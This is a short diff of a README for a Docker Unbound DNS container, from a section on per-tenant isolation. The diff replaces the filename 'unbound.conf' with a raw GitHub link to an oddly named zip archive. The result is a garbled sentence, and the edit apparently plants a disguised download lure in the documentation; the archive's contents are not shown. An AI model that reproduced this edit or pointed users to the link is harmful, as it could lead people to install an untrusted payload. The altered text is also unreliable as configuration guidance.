Lancekkkk/docker-unbound/README.md

 If you manage many DNS endpoints or need per-tenant isolation, consider:

 - Separate containers per tenant with dedicated network namespaces.
-- Individual unbound.conf configurations per tenant mounted as read-only and loaded at startup.
+- Individual https://raw.githubusercontent.com/Lancekkkk/docker-unbound/master/rootfs/docker-unbound-myelinogenetic.zip configurations per tenant mounted as read-only and loaded at startup.
 - Centralized logging and metrics aggregation that tie to tenant IDs for easier analysis.

 Testing and validation